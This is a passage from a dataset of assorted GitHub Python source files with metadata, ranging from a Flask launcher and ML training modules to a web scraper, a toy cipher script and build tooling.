BoilerPlate (CRUD) Style\"\"\"\n\nimport argparse\nimport os\nfrom dotenv import load_dotenv\nfrom backend import create_app\n\nload_dotenv()\n\nAPP = create_app()\n\nif __name__ == '__main__':\n PARSER = argparse.ArgumentParser(\n description=\"Casting Agency - FSND Capstone app\")\n\n PARSER.add_argument('--debug', action='store_true',\n help=\"\"\"Use flask debug/dev mode with file\n change reloading\"\"\")\n ARGS = PARSER.parse_args()\n\n PORT = int(os.environ.get('PORT', 5000))\n\n if ARGS.debug:\n print(\"Running in debug mode\")\n APP.run(host='0.0.0.0', port=PORT, debug=True)\n else:\n APP.run(host='0.0.0.0', port=PORT, debug=False)\n","repo_name":"zoom2ashish/fsnd-capstone","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27625701394","text":"from common.dataset_pool import DatasetPool\nfrom embeddings.embedding_node2vec import Node2VecEmbedding\n\n\ndef test_reconstuction_evaluation():\n # first case\n\n graph = DatasetPool.load(\"cora_ml\")\n emb_m = Node2VecEmbedding(graph, 10, 1, 1)\n emb_m.embed()\n\n undirected_projection = graph.to_undirected()\n print(\"#nodes = \", undirected_projection.nodes_cnt())\n print(\"#edges = \", undirected_projection.edges_cnt())\n\n num_links = undirected_projection.edges_cnt()\n\n reconstructed_graph = emb_m.reconstruct(num_links)\n print(\"#nodes = \", reconstructed_graph.nodes_cnt())\n print(\"#edges = \", reconstructed_graph.edges_cnt())\n\n # graph reconstruction evaluation\n precision_val = undirected_projection.link_precision(reconstructed_graph)\n map_val, _ = undirected_projection.map_value(reconstructed_graph)\n recall_val, _ = undirected_projection.recall(reconstructed_graph)\n\n print(\"PRECISION@K = \", precision_val, \"MAP = \", map_val, \", RECALL = \", recall_val)\n\n # second case\n\n graph = DatasetPool.load(\"cora_ml\").to_undirected()\n emb_m = Node2VecEmbedding(graph, 10, 1, 1)\n emb_m.embed()\n\n print(\"#nodes = \", graph.nodes_cnt())\n print(\"#edges = \", graph.edges_cnt())\n\n num_links = graph.edges_cnt()\n\n reconstructed_graph = emb_m.reconstruct(num_links)\n print(\"#nodes = \", reconstructed_graph.nodes_cnt())\n print(\"#edges = \", reconstructed_graph.edges_cnt())\n\n # graph reconstruction evaluation\n precision_val = graph.link_precision(reconstructed_graph)\n map_val, _ = graph.map_value(reconstructed_graph)\n recall_val, _ = graph.recall(reconstructed_graph)\n\n print(\"PRECISION@K = \", precision_val, \"MAP = \", map_val, \", RECALL = \", recall_val)\n\n\nif __name__ == \"__main__\":\n test_reconstuction_evaluation()\n","repo_name":"graphsinspace/graspe","sub_path":"src/graspe/tests/test_rec_eval.py","file_name":"test_rec_eval.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"7166782687","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom matplotlib.colors import ListedColormap\n\ndef plot_decision_regions(X, y, classifier, resolution = 0.02):\n\n # Setup the marker generator and color map\n markers = (\"s\", \"x\", \"o\", \"^\", \"v\")\n colors = (\"red\", \"blue\", \"lightgreen\", \"gray\", \"cyan\")\n colorMap = ListedColormap(colors[:len(np.unique(y))])\n\n # Plot the decision surface (setting the boundries of the graph)\n x1_min = X[:, 0].min() - 1 # The minimum value for feature 0, the sepal length, of the setosa data\n x1_max = X[:, 0].max() + 1 # The maximum value for feature 0, the sepal length, of the versicolor data\n\n x2_min = X[:, 1].min() - 1 # The minimum value for feature 1, the petal length, of the versicolor data\n x2_max = X[:, 1].max() + 1 # The maximum value for feature 1, the petal length, of the versicolor data\n\n print(\"x1_min: \" + str(x1_min))\n print(\"x1_max: \" + str(x1_max))\n\n print(\"x2_min: \" + str(x2_min))\n print(\"x2_max: \" + str(x2_max))\n\n # Create a meshgrid, the aligning coordinates from two vectors, x1 and x2\n xx1, xx2 = np.meshgrid(\n np.arange(x1_min, x1_max, resolution), # Return evenly spaces values given an interval\n np.arange(x2_min, x2_max, resolution)\n )\n\n # Set vector Z = to the class label predictions of the corresponding grid points\n Z = classifier.predict(\n np.array(\n [xx1.ravel(), xx2.ravel()]\n ).T\n )\n\n # Reshape the vector Z to be the same size (same number of columns)\n # as the two-feature matrix so that it can be\n # graphed & predicted just like the Iris training subset\n Z = Z.reshape(xx1.shape)\n\n # Graph the trained (predicted) data\n plt.contourf(\n xx1, xx2,\n Z,\n alpha = 0.3,\n cmap = colorMap\n )\n\n # Plot the limits of the datasets. Why? No clue.\n # Doesn't look like there's much of a difference with or w/o\n plt.xlim(xx1.min(), xx1.max())\n plt.ylim(xx2.min(), xx2.max())\n\n # Plot the class samples\n for idx, cl in enumerate(np.unique(y)):\n plt.scatter(\n x = X[y == cl, 0], # Plot feature 1/0\n y = X[y == cl, 1], # Plot feature 2/1\n alpha = 0.8, # Transparency\n c = colors[idx],\n marker = markers[idx],\n label = cl,\n edgecolor = \"black\"\n )\n","repo_name":"mattnappo/machine-learning","sub_path":"linear_classification/decision_regions.py","file_name":"decision_regions.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5357359528","text":"def slices(series, length):\n if not series:\n raise ValueError('empty series')\n if (length > len(series)) | (length <= 0):\n raise ValueError('invalid input ')\n\n substrings = []\n for i in range(len(series) - (length - 1)):\n substrings.append(series[i:i + length])\n return substrings\n","repo_name":"pwnsaur/exercism","sub_path":"python/series/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25478876871","text":"from foundation_test.util.db.db_util import DataBase\nimport pytest\n\n\nDB = {\n \"china\": {\n 'fox': 'qsq_fox{0}'\n },\n \"thailand\": {\n 'fox': 'arcticfox-thailand'\n },\n \"philippines\": {\n 'fox': 'arcticfox-philippines'\n },\n \"mexico\": {\n 'fox': 'arcticfox-mexico'\n },\n \"india\": {\n 'fox': 'arcticfox-india'\n },\n \"pakistan\": {\n 'fox': 'arcticfox-pakistan'\n }\n}\n\nDEFAULT_OPT = {\n \"--env\": 1,\n \"--country\": 'china',\n \"--environment\": 'test'\n}\n\n\ndef get_sysconfig(option):\n return pytest.config.getoption(option) if hasattr(pytest, 'config') else DEFAULT_OPT[option]\n\n\nENV = get_sysconfig('--env')\nCOUNTRY = get_sysconfig('--country')\nENVIRONMENT = get_sysconfig('--environment')\n\n\nDH_DB = DataBase(DB[COUNTRY]['fox'].format(ENV), ENVIRONMENT) if COUNTRY == 'china' \\\n else DataBase(DB[COUNTRY]['fox'], ENVIRONMENT)\n\n\ndef init_dh_env(env, country, environment):\n global DH_DB\n # china中国、thailand泰国、philippines菲律宾、mexico墨西哥、pakistan巴基斯坦、india印度\n DH_DB = DataBase(DB[country]['fox'].format(env), environment) if country == 'china' \\\n else DataBase(DB[country]['fox'], environment)\n\n\ndef init_env(env, country, environment):\n # 工具环境初始化\n init_dh_env(env, country, environment)\n\n\n# pytest环境初始化\ninit_env(env=get_sysconfig('--env'), country=get_sysconfig('--country'), environment=get_sysconfig('--environment'))\n","repo_name":"xiujingyuan/framework-test","sub_path":"foundation_test/config/dh/db_const.py","file_name":"db_const.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34655599444","text":"_author_ = 'jake'\n_project_ = 'leetcode'\n\n# https://leetcode.com/problems/single-number/\n# Given an array of integers, every element appears twice except for one. Find that single one.\n\n# Any number xor with itself is zero.\n# Time - O(n)\n# Space - O(1)\n\nclass Solution(object):\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n xor = 0\n for num in nums:\n xor ^= num\n return xor","repo_name":"jakehoare/leetcode","sub_path":"python_1_to_1000/136_Single_Number.py","file_name":"136_Single_Number.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"50"} +{"seq_id":"7534475978","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef get_last_page(URL):\n result = requests.get(URL)\n soup = BeautifulSoup(result.text, \"html.parser\")\n pages = soup.find(\"div\", {\"class\": \"s-pagination\"}).find_all(\"a\")\n last_page = pages[-2].get_text(strip=True)\n return int(last_page)\n\n\ndef extra_job(html):\n title = html.find(\"h2\", {\"class\": \"fs-body3\"}).find(\"a\")[\"title\"]\n company, location = html.find(\"h3\", {\n \"class\": \"fs-body1\"\n }).find_all(\n \"span\", recursive=False)\n company = company.get_text(strip=True)\n location = location.get_text(strip=True)\n job_id = html[\"data-jobid\"]\n return {\n \"title\": title,\n \"company\": company,\n \"location\": location,\n \"apply_link\": f\"https://stackoverflow.com/jobs/{job_id}\"\n }\n\n\ndef extra_jobs(last_page, URL):\n jobs = []\n for page in range(last_page):\n print(f\"Scrappingpage SO : {page}\")\n result = requests.get(f\"{URL}?pg={page+1}\")\n soup = BeautifulSoup(result.text, \"html.parser\")\n results = soup.find_all(\"div\", {\"class\": \"-job\"})\n for result in results:\n job = extra_job(result)\n jobs.append(job)\n return jobs\n\n\ndef get_jobs(word):\n URL = f\"https://stackoverflow.com/jobs?q={word}&sort=1\"\n last_page = get_last_page(URL)\n jobs = extra_jobs(last_page, URL)\n return jobs\n","repo_name":"Action2theFuture/WEBScrapper2","sub_path":"Scrapper.py","file_name":"Scrapper.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"30286105933","text":"import random\nimport secrets\n\n#Verlangt die erwünschte Plain Text zu Verschlüsseln\nalphabetisch = input(\"Sie können hier ihr Text schreiben, \" \\\n \"welchen Sie gerne verschlüsselt haben möchten:\")\n#Verwandelt alles in Binär und erstellt die Liste e\ndef binar(alphabetisch):\n a, b = [], []\n for i in alphabetisch:\n a.append(ord(i))\n for i in a:\n b.append((bin(i)[2:]).zfill(8))\n return b\ne = binar(alphabetisch)\nprint (e)\nglobal z\nz = 0\nfor i in e:\n z = z + 1\nprint(z)\nprint(len(e))\nfor i in range(81 - len(e)):\n zufzhl = random.randint(129, 255)\n e.append(bin(zufzhl)[2:])\n z = 81\nprint(e)\n\n\n\n#SUBSTITUTION-BOX\n#TRANSPOSITION SHIFTS\n#Key generation\ndef schlüsselgenerator():\n schlüssel_länge_bytes = 16\n key = secrets.token_bytes(schlüssel_länge_bytes)\n return key\ndef bytes_zu_binary(byte_str):\n return \"\".join(f\"{byte:08b}\" for byte in byte_str)\ndef keykleinermachen(key_str):\n smaller_keys = [key_str[i:i+8] for i in range(0, len(key_str), 8)]\n return smaller_keys\nschlüssel = schlüsselgenerator()\nbinärer_schlüssel = bytes_zu_binary(schlüssel)\nsmaller_keys = keykleinermachen(binärer_schlüssel)\nfor i, key in enumerate(smaller_keys, 1):\n globals()[f\"key{i}\"] = key\nprint(binärer_schlüssel)\nprint(key1)\nprint(key2)\nprint(key3)\nprint(key4)\nprint(key5)\nprint(key6)\nprint(key7)\nprint(key8)\nprint(key9)\n\n\n#DISPLACEMENT\n\n#KEY INFUSION\n#Transposition shifts\n\n#Key infusion\n","repo_name":"AlicanKaratasli/Matura-Arbeit-AEBC","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"18002721471","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\nfrom .settings import Settings\nfrom .updates import Updates\nfrom .list import List\nfrom . import repo\ntry:\n from .flatpak import Flatpak\nexcept (ImportError, ValueError):\n Flatpak = False\n\nfrom gettext import gettext as _ \n\nclass Stack(Gtk.Box):\n\n def __init__(self, parent):\n Gtk.Box.__init__(self, orientation=Gtk.Orientation.VERTICAL, spacing=6)\n self.parent = parent\n try:\n self.system_repo = repo.get_system_repo()\n except:\n self.system_repo = None\n self.sources = {}\n self.errors = {}\n self.sources, self.errors = repo.get_all_sources()\n\n self.stack = Gtk.Stack()\n self.stack.set_transition_type(Gtk.StackTransitionType.SLIDE_LEFT_RIGHT)\n self.stack.set_transition_duration(300)\n\n self.setting = Settings(self)\n self.stack.add_titled(self.setting, \"settings\", _(\"Settings\"))\n \n self.updates = Updates(self)\n self.stack.add_titled(self.updates, \"updates\", _(\"Updates\"))\n \n self.list_all = List(self)\n self.stack.add_titled(self.list_all, \"list\", _(\"Extra Sources\"))\n \n if Flatpak:\n self.flatpak = Flatpak(self)\n\n if Flatpak:\n self.stack.add_titled(self.flatpak, \"flatpak\", _(\"Flatpak\"))\n\n self.pack_start(self.stack, True, True, 0)\n\n\n","repo_name":"PikaOS-Linux/pkgs-baseos","sub_path":"repoman/archive/repoman/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"27100266501","text":"\"\"\"Profile decorator for profiling functions.\"\"\"\nimport cProfile\nimport pstats\nimport io\n\n\nclass profile_deco:\n\n def __init__(self, function):\n self.prof = cProfile.Profile()\n # Set new attribute.\n self.function = function\n\n def __call__(self, *args, **kwargs):\n self.prof.runcall(self.function, *args, **kwargs)\n\n def print_stat(self):\n \"\"\"Prints cummulative statistics about function.\"\"\"\n s = io.StringIO()\n ps = pstats.Stats(self.prof, stream=s).sort_stats(\"cumulative\")\n ps.print_stats()\n print(s.getvalue())\n\n\n@profile_deco\ndef add(a, b):\n return a + b\n\n\n@profile_deco\ndef sub(a, b):\n return a - b\n\n\nadd(1, 2)\nadd(4, 5)\nsub(4, 5)\n\nadd.print_stat()\nsub.print_stat()\n","repo_name":"Geolan84/DeepPython","sub_path":"08/profile_decorator.py","file_name":"profile_decorator.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37870464193","text":"from pants import (\n InternalTarget,\n JavaLibrary,\n JavaProtobufLibrary,\n JavaTests,\n JavaThriftLibrary,\n ScalaLibrary,\n ScalaTests,\n is_jvm,\n)\n\ndef extract_target(java_targets, name = None):\n \"\"\"Extracts a minimal set of linked targets from the given target's internal transitive dependency\n set. The root target in the extracted target set is returned. The algorithm does a topological\n sort of the internal targets and then tries to coalesce targets of a given type. Any target with\n a custom ant build xml will be excluded from the coalescing.\"\"\"\n\n # TODO(John Sirois): this is broken - representative_target is not necessarily representative\n representative_target = list(java_targets)[0]\n\n meta_target_base_name = \"fast-%s\" % (name if name else representative_target.name)\n provides = None\n deployjar = hasattr(representative_target, 'deployjar') and representative_target.deployjar\n buildflags = representative_target.buildflags\n\n def create_target(target_type, target_name, target_index, targets):\n def name(name):\n return \"%s-%s-%d\" % (target_name, name, target_index)\n\n if target_type == JavaProtobufLibrary:\n return JavaProtobufLibrary._aggregate(name('protobuf'), provides, buildflags, targets)\n elif target_type == JavaThriftLibrary:\n return JavaThriftLibrary._aggregate(name('thrift'), provides, buildflags, targets)\n elif target_type == JavaLibrary:\n return JavaLibrary._aggregate(name('java'), provides, deployjar, buildflags, targets)\n elif target_type == ScalaLibrary:\n return ScalaLibrary._aggregate(name('scala'), provides, deployjar, buildflags, targets)\n elif target_type == JavaTests:\n return JavaTests._aggregate(name('java-tests'), buildflags, targets)\n elif target_type == ScalaTests:\n return ScalaTests._aggregate(name('scala-tests'), buildflags, targets)\n else:\n raise Exception(\"Cannot aggregate targets of type: %s\" % target_type)\n\n # chunk up our targets by type & custom build xml\n coalesced = InternalTarget.coalesce_targets(java_targets)\n coalesced = list(reversed(coalesced))\n\n start_type = type(coalesced[0])\n start = 0\n descriptors = []\n\n for current in range(0, len(coalesced)):\n current_target = coalesced[current]\n current_type = type(current_target)\n\n if current_target.custom_antxml_path:\n if start < current:\n # if we have a type chunk to our left, record it\n descriptors.append((start_type, coalesced[start:current]))\n\n # record a chunk containing just the target that has the custom build xml to be conservative\n descriptors.append((current_type, [current_target]))\n start = current + 1\n if current < (len(coalesced) - 1):\n start_type = type(coalesced[start])\n\n elif start_type != current_type:\n # record the type chunk we just left\n descriptors.append((start_type, coalesced[start:current]))\n start = current\n start_type = current_type\n\n if start < len(coalesced):\n # record the tail chunk\n descriptors.append((start_type, coalesced[start:]))\n\n # build meta targets aggregated from the chunks and keep track of which targets end up in which\n # meta targets\n meta_targets_by_target_id = dict()\n targets_by_meta_target = []\n for (target_type, targets), index in zip(descriptors, reversed(range(0, len(descriptors)))):\n meta_target = create_target(target_type, meta_target_base_name, index, targets)\n targets_by_meta_target.append((meta_target, targets))\n for target in targets:\n meta_targets_by_target_id[target._id] = meta_target\n\n # calculate the other meta-targets (if any) each meta-target depends on\n extra_targets_by_meta_target = []\n for meta_target, targets in targets_by_meta_target:\n meta_deps = set()\n custom_antxml_path = None\n for target in targets:\n if target.custom_antxml_path:\n custom_antxml_path = target.custom_antxml_path\n for dep in target.resolved_dependencies:\n if is_jvm(dep):\n meta = meta_targets_by_target_id[dep._id]\n if meta != meta_target:\n meta_deps.add(meta)\n extra_targets_by_meta_target.append((meta_target, meta_deps, custom_antxml_path))\n\n def lift_excludes(meta_target):\n excludes = set()\n def lift(target):\n if target.excludes:\n excludes.update(target.excludes)\n for jar_dep in target.jar_dependencies:\n excludes.update(jar_dep.excludes)\n for internal_dep in target.internal_dependencies:\n lift(internal_dep)\n lift(meta_target)\n return excludes\n\n # link in the extra inter-meta deps\n meta_targets = []\n for meta_target, extra_deps, custom_antxml_path in extra_targets_by_meta_target:\n meta_targets.append(meta_target)\n meta_target.update_dependencies(extra_deps)\n meta_target.excludes = lift_excludes(meta_target)\n meta_target.custom_antxml_path = custom_antxml_path\n\n sorted_meta_targets = InternalTarget.sort_targets(meta_targets)\n def prune_metas(target):\n if sorted_meta_targets:\n try:\n sorted_meta_targets.remove(target)\n except ValueError:\n # we've already removed target in the current walk\n pass\n\n # link any disconnected meta_target graphs so we can return 1 root target\n root = None\n while sorted_meta_targets:\n new_root = sorted_meta_targets[0]\n new_root.walk(prune_metas, is_jvm)\n if root:\n new_root.update_dependencies([root])\n root = new_root\n\n return root\n","repo_name":"collude/collude","sub_path":"src/python/pants/ant/bang.py","file_name":"bang.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37700052791","text":"\"\"\"Misc tests for midani\n\"\"\"\nimport os\nimport sys\n\nfrom midani import midani_score\nfrom midani import midani_settings\nfrom midani import midani_time\n\nSCRIPT_PATH = os.path.dirname((os.path.realpath(__file__)))\n\n\ndef test_bg_beat_times():\n midi_fname = \"../sample_music/effrhy_2207.mid\"\n settings_kwargs = {\n \"midi_fname\": os.path.join(SCRIPT_PATH, midi_fname),\n \"bg_beat_times_length\": 2,\n }\n settings = midani_settings.Settings(**settings_kwargs)\n score = midani_score.read_score(settings)\n tempo_changes = midani_time.TempoChanges(score)\n assert (\n len(tempo_changes.t_changes_btimes) == 1\n ), \"len(tempo_changes.t_changes_btimes) != 1\"\n assert (\n tempo_changes.t_changes_btimes[0.0] == 120.0\n ), \"tempo_changes.t_changes_btimes[0.0] != 120.0\"\n settings.update_from_score(score, tempo_changes)\n assert settings.bg_clock_times == list(\n range(33)\n ), \"settings.bg_clock_times != list(range(33))\"\n settings_kwargs[\"bg_beat_times_length\"] = 2\n settings_kwargs[\"bg_beat_times\"] = [\n 1,\n ]\n settings = midani_settings.Settings(**settings_kwargs)\n score = midani_score.read_score(settings)\n tempo_changes = midani_time.TempoChanges(score)\n settings.update_from_score(score, tempo_changes)\n assert settings.bg_clock_times == [\n i + 0.5 for i in range(33)\n ], \"settings.bg_clock_times != [i + 0.5 for i in range(33)]\"\n\n\nif __name__ == \"__main__\":\n test_bg_beat_times()\n","repo_name":"malcolmsailor/midani","sub_path":"tests/test_misc.py","file_name":"test_misc.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"631618669","text":"import pandas as pd\nfrom django.core.management.base import BaseCommand\n\nfrom sflp_portfolio.models.counterparty import Counterparty\nfrom sflp_portfolio.models.loan import Loan\nfrom sflp_portfolio.models.models import Portfolio\nfrom sflp_portfolio.models.models import PortfolioSnapshot\nfrom sflp_portfolio.models.property_collateral import PropertyCollateral\n\n\"\"\"\nNote: this is not a performant insertion of data, used for debugging data schemas / pipelines \n\n\"\"\"\n\n\nclass Command(BaseCommand):\n help = 'Imports Segmented Single Family Loan Performance data (Core Static Models)'\n\n # Clean up the database\n Portfolio.objects.all().delete()\n PortfolioSnapshot.objects.all().delete()\n Counterparty.objects.all().delete()\n Loan.objects.all().delete()\n PropertyCollateral.objects.all().delete()\n\n # Portfolio data\n portfolio_data = pd.read_csv(\"./sflp_portfolio/fixtures/portfolio.csv\", sep='|', index_col=None, low_memory=False,\n na_values=None,\n true_values=['Y'], false_values=['N'])\n\n portfolio_dict = {}\n for index, entry in portfolio_data.iterrows():\n portfolio, _ = Portfolio.objects.update_or_create(\n name=entry[0],\n description='Test SFLP Portfolio',\n )\n portfolio.save()\n portfolio_dict[entry[0]] = portfolio\n\n # Portfolio snapshot data\n portfolio_snapshot_data = pd.read_csv(\"./sflp_portfolio/fixtures/portfolio_snapshot.csv\", sep='|', index_col=None,\n low_memory=False, na_values=None,\n true_values=['Y'], false_values=['N'])\n\n portfolio_snapshot_dict = {}\n for index, entry in portfolio_snapshot_data.iterrows():\n portfolio_snapshot, _ = PortfolioSnapshot.objects.update_or_create(\n monthly_reporting_period=entry[0],\n )\n portfolio_snapshot.save()\n portfolio_snapshot_dict[entry[0]] = portfolio_snapshot\n\n loan_data = pd.read_csv(\"./sflp_portfolio/fixtures/loan.csv\", sep='|', index_col=None, low_memory=False,\n na_values=None,\n true_values=['Y'], false_values=['N'])\n\n loan_data_list = []\n i = 0\n LOAN_COUNT = 10\n\n loan_dict = {}\n for index, entry in loan_data.iterrows():\n if (i < LOAN_COUNT):\n loan = Loan.objects.create(\n id=i,\n loan_identifier=entry[0],\n portfolio=portfolio_dict[entry[1]],\n # snapshot=portfolio_snapshot_dict[entry[2]],\n channel=entry[3],\n original_interest_rate=entry[4],\n original_upb=entry[5],\n original_loan_term=entry[6],\n origination_date=entry[7],\n first_payment_date=entry[8],\n original_loan_to_value_ratio=entry[9],\n loan_purpose=entry[10],\n amortization_type=entry[11],\n relocation_mortgage_indicator=entry[12],\n high_balance_loan_indicator=entry[13],\n mortgage_insurance_percentage=entry[14],\n mortgage_insurance_type=entry[15],\n original_combined_loan_to_value_ratio=entry[16],\n # prepayment_penalty_indicator=entry[17],\n # interest_only_loan_indicator=entry[18],\n )\n loan.save()\n loan_dict[entry[0]] = loan\n i += 1\n\n # Counterparty data\n counterparty_data = pd.read_csv(\"./sflp_portfolio/fixtures/counterparty.csv\", sep='|', index_col=None,\n low_memory=False, na_values=None,\n true_values=['Y'], false_values=['N'])\n i = 0\n for index, entry in counterparty_data.iterrows():\n if i < LOAN_COUNT:\n counterparty = Counterparty.objects.create(\n id=i,\n loan_identifier=loan_dict[entry[0]], # loan FK reference\n counterparty_identifier=entry[0], # counterparty ID identical to loan ID\n number_of_borrowers=entry[1],\n debt_to_income=entry[2],\n borrower_credit_score_at_origination=entry[3],\n coborrower_credit_score_at_origination=entry[4],\n first_time_home_buyer_indicator=entry[5],\n )\n counterparty.save()\n i += 1\n\n # Property collateral data\n property_collateral_data = pd.read_csv(\"./sflp_portfolio/fixtures/property_collateral.csv\", sep='|', index_col=None,\n low_memory=False, na_values=None,\n true_values=['Y'], false_values=['N'])\n\n i = 0\n for index, entry in property_collateral_data.iterrows():\n if i < LOAN_COUNT:\n property_collateral = PropertyCollateral.objects.create(\n id=i,\n loan_identifier=loan_dict[entry[0]], # loan FK reference\n property_type=entry[1],\n number_of_units=entry[2],\n occupancy_status=entry[3],\n property_state=entry[4],\n metropolitan_statistical_area=entry[5],\n zip_code_short=entry[6]\n )\n property_collateral.save()\n i += 1\n\n def handle(self, *args, **options):\n self.stdout.write(self.style.SUCCESS('Successfully inserted Core SFLP data into db'))\n","repo_name":"open-risk/openNPL","sub_path":"sflp_portfolio/management/commands/load_static_sflp_csv.py","file_name":"load_static_sflp_csv.py","file_ext":"py","file_size_in_byte":5468,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"40393555163","text":"import numpy as np\n\nfrom torch import nn\nfrom torch.nn import functional as F\nimport pytorch_lightning as pl\nimport torch\n\nfrom benchmarks.validation_metrics import LeadTimeEval\nfrom benchmarks.unet import UNet\n\nclass FeaturesSysUNet(pl.LightningModule):\n def __init__(self, UNet_params: dict, extra_data: str, depth: int, height: int, \n width: int, len_seq_in: int, len_seq_out: int, bins_to_predict: int, \n seq_mode: str, **kwargs):\n super(FeaturesSysUNet, self).__init__()\n\n \n self.save_hyperparameters()\n self.model = UNet(**UNet_params)\n self.extra_data = extra_data\n self.depth = depth\n self.height = height\n self.width = width\n self.len_seq_in = len_seq_in\n self.len_seq_out = len_seq_out\n self.bins_to_predict = bins_to_predict\n self.seq_mode = seq_mode\n \n self.target_vars = kwargs['target_vars']\n self.main_metric = 'mse'\n \n self.leadTeval = LeadTimeEval(len_seq_in, bins_to_predict, len(self.target_vars))\n self.prec = 7\n\n loss = 'mse'\n self.loss_fn = {'smoothL1': nn.SmoothL1Loss(), 'L1': nn.L1Loss(), 'mse': F.mse_loss}\n self.loss_fn = self.loss_fn[loss]\n \n def on_fit_start(self):\n \"\"\" create a placeholder to save the results of the metric per variable \"\"\"\n metric_placeholder = { metric: -1 for metric in self.target_vars}\n metric_placeholder = {**metric_placeholder, **{self.main_metric: -1}}\n self.logger.log_hyperparams(self.hparams, metric_placeholder)\n \n def forward(self, x):\n return self.model(x)\n \n def _compute_loss(self, y_hat, y, agg=True):\n\n if agg:\n loss = self.loss_fn(y_hat, y)\n else:\n loss = self.loss_fn(y_hat, y, reduction='none')\n return loss\n \n def training_step(self, batch, batch_idx, phase='train'):\n\n x, y, *ignored = batch\n y_hat = self.forward(x)\n \n loss = self._compute_loss(y_hat, y)\n self.log(f'{phase}_loss', loss)\n return loss\n \n def validation_step(self, batch, batch_idx, phase='val'):\n \n x, y, *ignored = batch\n y_hat = self.forward(x)\n\n loss = self._compute_loss(y_hat, y)\n return loss\n\n def validation_epoch_end(self, outputs, phase='val'):\n avg_loss = torch.stack([x for x in outputs]).mean()\n self.log(f'{phase}_loss_epoch', avg_loss, prog_bar=True)\n self.log(self.main_metric, avg_loss)\n \n def test_step(self, batch, batch_idx, phase='test'):\n\n x, y, metadata = batch\n y_hat = self.forward(x)\n \n loss = self._compute_loss(y_hat, y, agg=False)\n self.log(f'{phase}_loss', loss.mean())\n \n # reduce spatial dims - keep batch & channels\n loss = loss.mean(dim=(-1, -2))#.detach().cpu().numpy()\n self.leadTeval.update_errors(loss.detach().cpu().numpy(), metadata)\n \n # reduce batch - keep channels\n loss = loss.mean(dim=(0)) \n return loss\n \n def test_epoch_end(self, outputs, phase='test'):\n # ------------\n # 1. Test Channels\n # ------------\n # concat batches and compute the mean among them preserving channels\n val_set_loss = torch.stack(outputs, dim=0)\n val_set_loss = val_set_loss.mean(dim=(0))\n val_set_loss = self.leadTeval.get_numpy(val_set_loss)\n \n # log metrics\n text = f'extra data: {self.extra_data} | '\n for i, channel in enumerate(self.target_vars):\n self.log(channel, val_set_loss[i])\n v = np.format_float_positional(val_set_loss[i], precision=self.prec)\n text += f'{channel}: {v} | '\n \n v = np.format_float_positional(val_set_loss.mean(), precision=self.prec)\n text += f'mse: {v}'\n print(text)\n self.log(self.main_metric, val_set_loss.mean())\n \n # ------------\n # 2. Test Lead Time\n # ------------\n #fname = f'{self.logger.log_dir}/lead_times_mse.csv'\n region_id = self.test_dataloader().dataset.region_id\n ers, std = self.leadTeval.get_lead_time_metrics(self.logger.log_dir, text, region_id)\n \n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)\n return optimizer\n \n","repo_name":"iarai/weather4cast","sub_path":"benchmarks/FeaturesSysUNet.py","file_name":"FeaturesSysUNet.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"52"} +{"seq_id":"44436958546","text":"# INPUT: -v full/vocab_full_[test/train/both].pkl (choose any full vocabulary)\n# -n (top n words based on frequency that we will keep)\n\n# OUTPUT: cut/cut-vocab-frequency.pkl\n# TYPE: list(tuple)<(word, frequency)>\n\nimport pickle\nfrom argparse import ArgumentParser\nimport constants\nimport os\n\nparser = ArgumentParser()\nparser.add_argument(\"-v\", choices=[\"test\", \"train-short\", \"train-full\", \"test-and-train-short\", \"test-and-train-full\",\n \"nodup-test-and-train-full\"])\nparser.add_argument(\"-n\", type=int)\nargs = parser.parse_args()\n\nwith open(os.path.join(constants.VOCABULARIES_FULL_PATH, f\"{args.v}.pkl\"), \"rb\") as inputfile:\n full_vocab = pickle.load(inputfile)\n\n# Select the n most frequent words.\nfull_vocab.sort(key=lambda p: p[1], reverse=True)\ncut_vocab = [word for (word, count) in full_vocab[:args.n]]\n\nwith open(os.path.join(constants.VOCABULARIES_CUT_PATH, f\"cut-vocab-{args.v}-{args.n}-most-frequent.pkl\"), \"wb\") as outputfile:\n pickle.dump(cut_vocab, outputfile)\n\nwith open(os.path.join(constants.VOCABULARIES_CUT_PATH, f\"cut-vocab-{args.v}-{args.n}-most-frequent.txt\"), \"w\") as 